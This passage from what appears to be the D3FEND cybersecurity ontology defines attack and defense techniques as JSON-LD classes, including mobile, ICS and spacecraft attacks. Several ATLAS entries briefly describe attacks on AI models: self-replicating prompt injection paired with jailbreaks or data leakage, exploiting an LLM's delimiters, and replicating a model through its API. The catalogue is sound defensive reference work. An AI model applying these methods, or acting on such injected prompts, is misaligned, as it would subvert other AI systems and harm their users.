      "d3f:attack-id": "T1629.002",
      "d3f:definition": "An adversary may seek to inhibit user interaction by locking the legitimate user out of the device. This is typically accomplished by requesting device administrator permissions and then locking the screen using `DevicePolicyManager.lockNow()`. Other novel techniques for locking the user out of the device have been observed, such as showing a persistent overlay, using carefully crafted “call” notification screens, and locking HTML pages in the foreground. These techniques can be very difficult to get around, and typically require booting the device into safe mode to uninstall the malware.(Citation: Microsoft MalLockerB)(Citation: Talos GPlayed)(Citation: securelist rotexy 2018)",
      "rdfs:label": "Device Lockout - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1629"
      },
      "skos:prefLabel": "Device Lockout"
    },
    {
      "@id": "d3f:CloudConfiguration",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Information used to configure the services, parameters, and initial settings for a virtual server instance running in a cloud service.",
      "rdfs:label": "Cloud Configuration",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationResource"
      },
      "skos:altLabel": "Cloud Configuration Information"
    },
    {
      "@id": "d3f:PER-0005",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "PER-0005",
      "d3f:definition": "Threat actors may acquire or leverage valid credentials to maintain persistent access to a spacecraft or its supporting command and control (C2) systems. These credentials may include system service accounts, user accounts, maintenance access credentials, cryptographic keys, or other authentication mechanisms that enable continued entry without triggering access alarms. By operating with legitimate credentials, adversaries can sustain access over extended periods, evade detection, and facilitate follow-on tactics such as command execution, data exfiltration, or lateral movement. Credentialed persistence is particularly effective in environments lacking strong credential lifecycle management, segmentation, or monitoring, allowing threat actors to exploit trusted pathways while remaining embedded in mission operations.",
      "d3f:uses": {
        "@id": "d3f:Credential"
      },
      "rdfs:label": "Credentialed Persistence - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/PER-0005/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAPersistenceTechnique"
        },
        {
          "@id": "_:Ne668a61b240041aba595827c419fc326"
        }
      ],
      "skos:prefLabel": "Credentialed Persistence"
    },
    {
      "@id": "_:Ne668a61b240041aba595827c419fc326",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Credential"
      }
    },
    {
      "@id": "d3f:ConfigurationResource",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A resource used to configure a system including software and hardware.",
      "rdfs:label": "Configuration Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:Resource"
      }
    },
    {
      "@id": "d3f:LinuxOpenArgumentO_CREAT",
      "@type": "owl:Class",
      "d3f:definition": "Create a regular file.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/open.2.html"
      },
      "rdfs:label": "Linux Open Argument O_CREAT",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateFile"
      }
    },
    {
      "@id": "d3f:NetworkAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkAccessMediation"
      ],
      "d3f:d3fend-id": "D3-NAM",
      "d3f:definition": "Network access mediation is the control method for authorizing access to a system by a user (or a process acting on behalf of a user) communicating through a network, including a local area network, a wide area network, and the Internet.",
      "d3f:isolates": {
        "@id": "d3f:Network"
      },
      "d3f:kb-article": "## How it works\n\nNetwork Access Mediation is a crucial process in telecommunications and IT networks that involves controlling access to network resources. It acts as an intermediary layer between network access requests and the actual network resources, ensuring that only authorized users and devices can access the network.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "d3f:synonym": "Network Access Control",
      "rdfs:label": "Network Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-160v1r1.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N35c2c120b1554369963d36dda275addc"
        }
      ]
    },
    {
      "@id": "_:N35c2c120b1554369963d36dda275addc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Network"
      }
    },
    {
      "@id": "d3f:ComputerCase",
      "@type": "owl:Class",
      "d3f:definition": "A computer case is a computer enclosure which encloses a single primary computer.",
      "rdfs:label": "Computer Case",
      "rdfs:seeAlso": "https://dbpedia.org/page/Computer_case",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:T1641",
      "@type": "owl:Class",
      "d3f:attack-id": "T1641",
      "d3f:definition": "Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Data Manipulation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKMobileImpactTechnique"
      },
      "skos:prefLabel": "Data Manipulation"
    },
    {
      "@id": "d3f:CWE-1023",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1023",
      "d3f:definition": "The product performs a comparison between entities that must consider multiple factors or characteristics of each entity, but the comparison does not include one or more of these factors.",
      "rdfs:label": "Incomplete Comparison with Missing Factors",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-697"
      }
    },
    {
      "@id": "d3f:DiskFormatting",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DiskFormatting"
      ],
      "d3f:d3fend-id": "D3-DKF",
      "d3f:definition": "Disk Formatting is the process of preparing a data storage device, such as a hard drive, solid-state drive, or USB flash drive, for initial use.",
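      "d3f:kb-article": "### How it works\n\nThis process involves setting up an empty file system on the disk, which includes creating a directory structure and initializing metadata structures. In cybersecurity, disk formatting can be used to remove all existing data on a disk, making it a clean slate for new data storage or to prevent unauthorized access to previously stored data. Formatting alone does not necessarily erase the underlying data: a quick format typically rewrites only file system structures, so earlier contents may remain recoverable until they are overwritten.",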
      "d3f:kb-reference": {
        "@id": "d3f:Reference-Remembranceofdatapassed:Astudyofdisksanitizationpractices"
      },
      "d3f:modifies": {
        "@id": "d3f:SecondaryStorage"
      },
      "rdfs:label": "Disk Formatting",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N06229f17e9e3406eb2931b79b9e5bb6e"
        }
      ]
    },
    {
      "@id": "_:N06229f17e9e3406eb2931b79b9e5bb6e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SecondaryStorage"
      }
    },
    {
      "@id": "d3f:T1539",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:SessionCookie"
      },
      "d3f:attack-id": "T1539",
      "d3f:definition": "An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website.",
      "rdfs:label": "Steal Web Session Cookie",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:N37619d8a1b374c748de131918a37b5e7"
        }
      ]
    },
    {
      "@id": "_:N37619d8a1b374c748de131918a37b5e7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionCookie"
      }
    },
    {
      "@id": "d3f:T1175",
      "@type": "owl:Class",
      "d3f:attack-id": "T1175",
      "d3f:definition": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**",
      "owl:deprecated": true,
      "rdfs:comment": "**This technique has been deprecated. Please use [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) and [Component Object Model](https://attack.mitre.org/techniques/T1559/001).**",
      "rdfs:label": "Component Object Model and Distributed COM",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:WebAPIResource",
      "@type": "owl:Class",
      "d3f:definition": "A web API resource is an API resource identified by a Uniform Resource Identifier (URI) and made available from one host to another host via a web protocol and across a network or networks.",
      "rdfs:label": "Web API Resource",
      "rdfs:subClassOf": {
        "@id": "d3f:WebResource"
      }
    },
    {
      "@id": "d3f:Reference-ControlLogix5570and5560Controllers",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://literature.rockwellautomation.com/idc/groups/literature/documents/um/1756-um001_-en-p.pdf"
      },
      "d3f:kb-abstract": "There are five types of ControlLogix controllers available. These types include the following: Standard ControlLogix controllers, Extreme environment ControlLogix controllers, Armor™ ControlLogix controllers, Standard GuardLogix® controllers, Armor GuardLogix controllers. This manual explains how to use standard, extreme environment, and Armor ControlLogix controllers.",
      "d3f:kb-organization": "Rockwell Automation",
      "d3f:kb-reference-of": {
        "@id": "d3f:DisableRemoteAccess"
      },
      "d3f:kb-reference-title": "ControlLogix 5570 and 5560 Controllers",
      "rdfs:label": "Reference - ControlLogix 5570 and 5560 Controllers"
    },
    {
      "@id": "d3f:SessionToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a session identifier, session ID or session token is a piece of data that is used in network communications (often over HTTPS) to identify a session, a series of related message exchanges.",
      "d3f:kb-article": "## How it works\n\nSession identifiers become necessary in cases where the communications infrastructure uses a stateless protocol such as HTTP. For example, a buyer who visits a seller's website wants to collect a number of articles in a virtual shopping cart and then finalize the shopping by going to the site's checkout page. This typically involves an ongoing communication where several webpages are requested by the client and sent back to them by the server. In such a situation, it is vital to keep track of the current state of the shopper's cart, and a session ID is one way to achieve that goal.",
      "d3f:synonym": [
        "Session ID",
        "Session Identifier",
        "Session Token"
      ],
      "rdfs:isDefinedBy": {
        "@id": "dbr:Session_ID"
      },
      "rdfs:label": "Session Token",
      "rdfs:subClassOf": {
        "@id": "d3f:AccessToken"
      }
    },
    {
      "@id": "d3f:T0884",
      "@type": "owl:Class",
      "d3f:attack-id": "T0884",
      "d3f:definition": "Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications.",
      "rdfs:label": "Connection Proxy - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCommandAndControlTechnique"
      },
      "skos:prefLabel": "Connection Proxy"
    },
    {
      "@id": "d3f:Reference-OpenSourceIntelligenceDeceptions_IllusiveNetworksLtd",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US10333976B1/en?assignee=Illusive+Networks+Ltd&oq=Illusive+Networks+Ltd+"
      },
      "d3f:kb-abstract": "A system to detect attackers who attempt to breach an enterprise network and attackers who have already breached the enterprise network, including an open source intelligence (OSINT) discoverer scanning the Internet to discover data related to an enterprise that is available online, an OSINT replacer generating deceptive files by replacing placeholders within template files with deceptive information, based on the data discovered by the OSINT discoverer, an OSINT distributor planting the deceptive files generated by the OSINT replacer within designated OSINT resources, and a deception management server that alerts an administrator in response to an attacker attempting to make a connection within the network using information in a deceptive file planted by the OSINT distributor.",
      "d3f:kb-author": "Hadar Yudovich; Nimrod Lavi; Sharon Bittan; Tom Kahana; Tom Sela",
      "d3f:kb-mitre-analysis": "Seems to focus on configuration oriented files to put in decoy hostnames etc. to publish on internet sites, then monitor the decoy \"objects\".",
      "d3f:kb-organization": "Illusive Networks Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:DecoyFile"
      },
      "d3f:kb-reference-title": "Open source intelligence deceptions",
      "rdfs:label": "Reference - Open source intelligence deceptions - Illusive Networks Ltd"
    },
    {
      "@id": "d3f:PropertyListFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In the OS X, iOS, NeXTSTEP, and GNUstep programming frameworks, property list files are files that store serialized objects. Property list files use the filename extension .plist, and thus are often referred to as p-list files. Property list files are often used to store a user's settings. They are also used to store information about bundles and applications, a task served by the resource fork in the old Mac OS.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Property_list"
      },
      "rdfs:label": "Property List File",
      "rdfs:subClassOf": {
        "@id": "d3f:ConfigurationFile"
      },
      "skos:altLabel": "Plist File"
    },
    {
      "@id": "d3f:AML.T0005.001",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.001",
      "d3f:definition": "Adversaries may replicate a private model.\nBy repeatedly querying the victim's [AI Model Inference API Access](/techniques/AML.T0040), the adversary can collect the target model's inferences into a dataset.\nThe inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.\n\nA replicated model that closely mimics the target model is a valuable resource in staging the attack.\nThe adversary can use the replicated model to [Craft Adversarial Data](/techniques/AML.T0043) for various purposes (e.g. [Evade AI Model](/techniques/AML.T0015), [Spamming AI System with Chaff Data](/techniques/AML.T0046)).",
      "rdfs:label": "Train Proxy via Replication - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.001"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Train Proxy via Replication"
    },
    {
      "@id": "d3f:AML.T0061",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0061",
      "d3f:definition": "An adversary may use a carefully crafted [LLM Prompt Injection](/techniques/AML.T0051) designed to cause the LLM to replicate the prompt as part of its output. This allows the prompt to propagate to other LLMs and persist on the system. The self-replicating prompt is typically paired with other malicious instructions (ex: [LLM Jailbreak](/techniques/AML.T0054), [LLM Data Leakage](/techniques/AML.T0057)).",
      "rdfs:label": "LLM Prompt Self-Replication - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0061"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASPersistenceTechnique"
      },
      "skos:prefLabel": "LLM Prompt Self-Replication"
    },
    {
      "@id": "d3f:Modem",
      "@type": "owl:Class",
      "d3f:definition": "A modem -- a portmanteau of \"modulator-demodulator\" -- is a hardware device that converts data into a format suitable for a transmission medium so that it can be transmitted from one computer to another (historically along telephone wires). A modem modulates one or more carrier wave signals to encode digital information for transmission and demodulates signals to decode the transmitted information. The goal is to produce a signal that can be transmitted easily and decoded reliably to reproduce the original digital data. Modems can be used with almost any means of transmitting analog signals from light-emitting diodes to radio. A common type of modem is one that turns the digital data of a computer into modulated electrical signal for transmission over telephone lines and demodulated by another modem at the receiver side to recover the digital data.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Modem"
      },
      "rdfs:label": "Modem",
      "rdfs:subClassOf": {
        "@id": "d3f:ComputerNetworkNode"
      }
    },
    {
      "@id": "d3f:In-memoryPasswordStore",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password store held in memory.",
      "rdfs:label": "In-memory Password Store",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordStore"
      }
    },
    {
      "@id": "d3f:OrchestrationWorker",
      "@type": "owl:Class",
      "d3f:definition": "A d3f:Server which receives commands from a d3f:OrchestrationController to execute workloads.",
      "rdfs:label": "Orchestration Worker",
      "rdfs:seeAlso": {
        "@id": "d3f:OrchestrationController"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OrchestrationServer"
      }
    },
    {
      "@id": "d3f:FileCopyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a file is duplicated, creating a new file in a different location or under a different name while preserving the original file's content and attributes.",
      "rdfs:label": "File Copy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:FileCreationEvent"
        },
        {
          "@id": "_:N7fc4777beb3d4dd6a16d768fb5252e4e"
        }
      ]
    },
    {
      "@id": "_:N7fc4777beb3d4dd6a16d768fb5252e4e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileAccessEvent"
      }
    },
    {
      "@id": "d3f:RestoreFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreFile"
      ],
      "d3f:d3fend-id": "D3-RF",
      "d3f:definition": "Restoring a file for an entity to access.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:File"
      },
      "rdfs:label": "Restore File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:N9e2225684476460eb328a106a7abf029"
        }
      ]
    },
    {
      "@id": "_:N9e2225684476460eb328a106a7abf029",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:EmailScanEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an email is inspected or analyzed for content, security, or compliance purposes. Scanning often involves identifying spam, detecting malware, or ensuring policy adherence before delivery or after reception.",
      "rdfs:label": "Email Scan Event",
      "rdfs:subClassOf": {
        "@id": "d3f:EmailEvent"
      }
    },
    {
      "@id": "d3f:IntrusionDetectionSystem",
      "@type": "owl:Class",
      "d3f:definition": "An intrusion detection system (IDS) is a device or software application that monitors a network or systems for malicious activity or policy violations. Any intrusion activity or violation is typically reported either to an administrator or collected centrally using a security information and event management (SIEM) system. A SIEM system combines outputs from multiple sources and uses alarm filtering techniques to distinguish malicious activity from false alarms.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Intrusion_detection_system"
      },
      "rdfs:label": "Intrusion Detection System",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "IDS"
    },
    {
      "@id": "d3f:PeripheralHubFirmware",
      "@type": "owl:Class",
      "d3f:definition": "Firmware that is installed on a peripheral hub device, such as a USB or FireWire hub.",
      "rdfs:label": "Peripheral Hub Firmware",
      "rdfs:seeAlso": {
        "@id": "dbr:USB_hub"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PeripheralFirmware"
      },
      "skos:altLabel": "USB Hub Firmware"
    },
    {
      "@id": "d3f:WindowsVirtualProtectEx",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Changes the protection on a region of committed pages in the virtual address space of a specified process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtAllocateVirtualMemory"
        },
        {
          "@id": "d3f:WindowsNtProtectVirtualMemory"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex"
      },
      "rdfs:label": "Windows VirtualProtectEx",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPIAllocateMemory"
        },
        {
          "@id": "_:Naeb20e98399b4e358c7eb4ec8dec1121"
        },
        {
          "@id": "_:N921e4a61d36a4702ba7c5dcca20690f2"
        }
      ]
    },
    {
      "@id": "_:Naeb20e98399b4e358c7eb4ec8dec1121",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtAllocateVirtualMemory"
      }
    },
    {
      "@id": "_:N921e4a61d36a4702ba7c5dcca20690f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtProtectVirtualMemory"
      }
    },
    {
      "@id": "d3f:Reference-RFC7208-SenderPolicyFramework-SPF-ForAuthorizingUseOfDomainsInEmail-IETF",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://tools.ietf.org/html/rfc7208"
      },
      "d3f:kb-abstract": "Email on the Internet can be forged in a number of ways. In particular, existing protocols place no restriction on what a sending host can use as the \"MAIL FROM\" of a message or the domain given on the SMTP HELO/EHLO commands.  This document describes version 1 of the Sender Policy Framework (SPF) protocol, whereby Administrative Management Domains (ADMDs) can explicitly authorize the hosts that are allowed to use their domain names, and a receiving host can check such authorization.",
      "d3f:kb-author": "S. Kitterman",
      "d3f:kb-organization": "Internet Engineering Task Force (IETF)",
      "d3f:kb-reference-of": {
        "@id": "d3f:TransferAgentAuthentication"
      },
      "d3f:kb-reference-title": "RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email",
      "rdfs:label": "Reference - RFC 7208: Sender Policy Framework (SPF) for Authorizing Use of Domains in Email - IETF"
    },
    {
      "@id": "d3f:FileEviction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:FileEviction"
      ],
      "d3f:d3fend-id": "D3-FEV",
      "d3f:definition": "File eviction techniques delete files from system storage.",
      "d3f:deletes": {
        "@id": "d3f:File"
      },
      "d3f:kb-article": "## How it works\n\nAdversaries may place files or programs into a computer's file system to perform malicious actions. As part of the eviction process, these files and programs should be removed to prevent further compromise or reinfection. Examples of malicious types of files are malware, which is directly harmful, and content files with the intent to deceive users (e.g., phishing).\n\nOn Windows systems, antivirus (AV) software should be used to safely and permanently remove malicious files. AV software may first quarantine a suspected malicious file, which is the process of moving a file from its original location to a new location and changing it so that it cannot be executed. Users can then verify that the file is not benign and then permanently delete it.\n\n## Considerations\n\nWhen it is determined that a file should be removed for security purposes, the organization--or systems implementing an organization's policies--may determine that the file should not simply be deleted from the enterprise's mission systems, but be quarantined to a secure system by an approved mechanism, so as to allow follow-up investigation by security staff.\n\nOn Windows systems, deleting a file in File Explorer does not permanently delete a file - it sends it to the Recycle Bin instead. The Recycle Bin must be emptied, or alternative steps must be performed to remove files completely. Even then, in some cases the data may persist on disk, so data shredder tools may be needed to completely wipe a file. Thus, AV tools are recommended.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-HowDoesAntivirusQuarantineWork-SafetyDetectives"
      },
      "rdfs:label": "File Eviction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ObjectEviction"
        },
        {
          "@id": "_:N77a77627080847b3a0ca778db2aab4e2"
        }
      ]
    },
    {
      "@id": "_:N77a77627080847b3a0ca778db2aab4e2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:deletes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:EX-0013.01",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0013.01",
      "d3f:definition": "Here the adversary saturates paths with legitimate telecommands or bus messages so the spacecraft burns scarce resources honoring them. Inputs may be innocuous (no-ops, time queries, telemetry requests) or low-risk configuration edits, but at scale they consume command handler cycles, fill queues, generate events and logs, trigger acknowledgments, and provoke downstream work in subsystems (e.g., repeated state reports, mode toggles, or file listings). On internal buses, valid actuator or housekeeping messages replayed at high rate can starve higher-priority publishers or cause control laws to chase stale stimuli. Because the traffic is syntactically correct, and often contextually plausible, the system attempts to process it rather than discard it early, increasing CPU usage, memory pressure, and power draw. Consequences include delayed or preempted legitimate operations, transient loss of commandability, and knock-on FDIR activity as deadlines slip and telemetry appears inconsistent.",
      "d3f:produces": {
        "@id": "d3f:OTProtocolMessage"
      },
      "rdfs:label": "Valid Commands - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0013/01/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0013"
        },
        {
          "@id": "_:N9c469961a60f43b6a1eb0d1c4b0ede17"
        }
      ],
      "skos:prefLabel": "Valid Commands"
    },
    {
      "@id": "_:N9c469961a60f43b6a1eb0d1c4b0ede17",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTProtocolMessage"
      }
    },
    {
      "@id": "d3f:RegOpenKeyA",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GetSystemConfigValue"
      ],
      "rdfs:label": "RegOpenKeyA"
    },
    {
      "@id": "d3f:LinuxCloneArgumentCLONE_THREAD",
      "@type": "owl:Class",
      "d3f:definition": "A flag parameter to the Clone syscall. If set, the child is placed in the same thread group as the calling process.",
      "rdfs:isDefinedBy": {
        "@id": "https://man7.org/linux/man-pages/man2/clone.2.html"
      },
      "rdfs:label": "Linux Clone Argument CLONE_THREAD",
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPICreateThread"
      }
    },
    {
      "@id": "d3f:LinearClassifier",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-LC",
      "d3f:definition": "A linear classifier is a model that makes a decision to categorize a set of data points into a discrete class based on a linear combination of its explanatory variables.",
      "d3f:kb-article": "## References\nA Look at the Maths Behind Linear Classification. Towards Data Science. [Link](https://towardsdatascience.com/a-look-at-the-maths-behind-linear-classification-166e99a9e5fb).",
      "rdfs:label": "Linear Classifier",
      "rdfs:subClassOf": {
        "@id": "d3f:Classification"
      }
    },
    {
      "@id": "d3f:MultipleRegressionLearning",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-MRL",
      "d3f:definition": "A supervised learning method that builds a multiple regression model using training data.",
      "d3f:kb-article": "## References\nYale University Department of Statistics. (1997-98). Linear regression and multivariate analysis. [Link](http://www.stat.yale.edu/Courses/1997-98/101/linmult.htm)",
      "rdfs:label": "Multiple Regression Learning",
      "rdfs:seeAlso": {
        "@id": "d3f:MultipleRegression"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:RegressionAnalysisLearning"
      }
    },
    {
      "@id": "d3f:T1562",
      "@type": "owl:Class",
      "d3f:attack-id": "T1562",
      "d3f:definition": "Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.",
      "rdfs:label": "Impair Defenses",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:Reference-Technical_Specifications_for_Construction_and_Management_of_Sensitive_Compartmented_Information_Facilities",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.dni.gov/files/Governance/IC-Tech-Specs-for-Const-and-Mgmt-of-SCIFs-v15.pdf"
      },
      "d3f:kb-author": "National Counterintelligence and Security Center",
      "d3f:kb-reference-of": {
        "@id": "d3f:RFShielding"
      },
      "d3f:kb-reference-title": "Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities",
      "rdfs:label": "Reference - Technical Specifications for Construction and Management of Sensitive Compartmented Information Facilities"
    },
    {
      "@id": "d3f:AML.T0069.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0069.000",
      "d3f:definition": "Adversaries may discover delimiters and special character sets used by the large language model. For example, delimiters are used in retrieval augmented generation applications to differentiate between context and user prompts. These can later be exploited to confuse or manipulate the large language model into misbehaving.",
      "rdfs:label": "Special Character Sets - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0069.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0069"
      },
      "skos:prefLabel": "Special Character Sets"
    },
    {
      "@id": "d3f:ProcessSegmentExecutionPrevention",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ProcessSegmentExecutionPrevention"
      ],
      "d3f:d3fend-id": "D3-PSEP",
      "d3f:definition": "Preventing execution of any address in a memory region other than the code segment.",
      "d3f:kb-article": "## How it works\n\nDuring execution of a process, the instruction pointer register should only point to addresses in a code segment (also called the .text segment), as this is the sole segment which should contain program code.\n\nWhen this technique detects an attempt to execute something that has been designated as non-executable, other techniques such as those in **Process Eviction** might be invoked, such as **Process Termination** to end the current process, or **Executable Blacklisting** to blacklist the potentially vulnerable or malfunctioning executable.\n\n### Software-based implementations\nThe software-based implementation in Windows XP SP2 might not perform the check every time the instruction pointer is changed, and does not check on each jump or return.  Before calling an exception handler, Windows XP SP2 software-enforced DEP checks whether the exception handler is located in a memory region marked as executable.  If the program was also built with SafeSEH, this implementation also checks before changing control to the exception handler whether it is a registered exception handler in the program's file on disk.\n\n### Hardware-based implementations\nThe NX (No Execute) or XD (Execute Disable) bit on the processor specifies whether a certain part of memory is executable.  Early implementations set this bit by the memory segment, while modern implementations which are built on the flat memory model often store this bit in each entry of the page table, to control execution by the page.\n\n\n## Considerations\n\nNon-hardware process data segment execution prevention is more susceptible to being turned off for a page of memory.\n\nDifferent implementations of this defense have been in place since the 1980s, but implementation stalled when larger 16-bit programs began stuffing code in the segments usually reserved for data. Many modern programs, which follow the best practice of separating code and data, are able to run under this defense.\n\nROP or ret2libc/return-to-function attacks could bypass this defense because, although they may pass attacker-controlled data or stack frames to a function, they abuse functions that are legitimately located in the .text segment (code segment) of the program.  For those, more advanced defenses such as a table of valid jump addresses, function call analysis, or return depth analysis could be used.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-DataExecutionPrevention_Microsoft"
        },
        {
          "@id": "d3f:Reference-WhatIsNX_XDFeature_RedHat"
        }
      ],
      "d3f:neutralizes": {
        "@id": "d3f:ProcessSegment"
      },
      "d3f:synonym": [
        "Execute Disable",
        "No Execute"
      ],
      "rdfs:label": "Process Segment Execution Prevention",
      "rdfs:subClassOf": [
        {
